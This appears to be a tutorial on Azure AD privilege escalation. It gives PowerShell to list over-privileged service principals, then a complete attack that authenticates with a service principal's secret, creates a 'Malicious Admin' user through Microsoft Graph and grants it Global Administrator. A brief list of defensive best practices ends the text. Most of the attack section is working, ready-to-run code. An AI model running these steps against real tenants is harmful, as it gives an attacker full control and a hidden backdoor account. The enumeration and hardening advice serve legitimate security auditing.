Azure AD Privilege Escalation

In this step, we'll use PowerShell to identify service principals with overly permissive rights. First, connect to your Azure AD tenant using the Azure AD PowerShell module: ```powershell Connect-AzureAD ``` Then, run the following command to list all service principals with high-privilege roles: ```powershell Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership | Where-Object {$_.ObjectType -eq 'Role' -and $_.RoleTemplateId -in ('62e90394-69f5-4237-9190-012177145e10', 'fe930be7-5e62-47db-91af-98c3a49a38b1')} ``` Analyze the output to identify any service principals with unnecessary high-privilege roles.

Now that we've identified vulnerable service principals, let's exploit a misconfigured role assignment. For this example, we'll assume we've found a service principal with the Application Administrator role. 1. Use the service principal's credentials to authenticate: ```powershell $clientId = 'vulnerable-sp-client-id' $clientSecret = 'vulnerable-sp-client-secret' $tenantId = 'your-tenant-id' $tokenBody = @{ Grant_Type = 'client_credentials' Scope = 'https://graph.microsoft.com/.default' Client_Id = $clientId Client_Secret = $clientSecret } $tokenResponse = Invoke-RestMethod -Uri "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token" -Method POST -Body $tokenBody $token = $tokenResponse.access_token ``` 2. Use the acquired token to create a new admin account: ```powershell $newAdminBody = @{ accountEnabled = $true displayName = 'Malicious Admin' userPrincipalName = '[email protected]' passwordProfile = @{ forceChangePasswordNextSignIn = $false password = 'SuperSecurePassword123!' } } | ConvertTo-Json Invoke-RestMethod -Headers @{Authorization = "Bearer $token"} -Uri 'https://graph.microsoft.com/v1.0/users' -Method POST -Body $newAdminBody -ContentType 'application/json' ``` 3. Assign Global Administrator role to the new account: ```powershell $globalAdminRoleId = '62e90394-69f5-4237-9190-012177145e10' $newAdminId = (Invoke-RestMethod -Headers @{Authorization = "Bearer $token"} -Uri 'https://graph.microsoft.com/v1.0/users?$filter=userPrincipalName eq '[email protected]'' -Method GET).value.id $roleAssignmentBody = @{ principalId = $newAdminId roleDefinitionId = $globalAdminRoleId directoryScopeId = '/' } | ConvertTo-Json Invoke-RestMethod -Headers @{Authorization = "Bearer $token"} -Uri 'https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments' -Method POST -Body $roleAssignmentBody -ContentType 'application/json' ``` You have now successfully exploited the misconfigured role assignment to create a new Global Administrator account.

To prevent privilege escalation attacks in Azure AD, implement the following best practices: 1. Regularly audit and review service principal permissions 2. Implement the principle of least privilege for all accounts and service principals 3. Use Privileged Identity Management (PIM) for just-in-time role activation 4. Enable and configure Conditional Access policies 5. Implement strong authentication methods, including Multi-Factor Authentication (MFA) 6. Monitor and alert on suspicious activities using Azure AD logs and Microsoft Cloud App Security 7. Regularly conduct security assessments and penetration tests on your Azure AD environment By following these best practices, you can significantly reduce the risk of privilege escalation attacks in your Azure AD environment.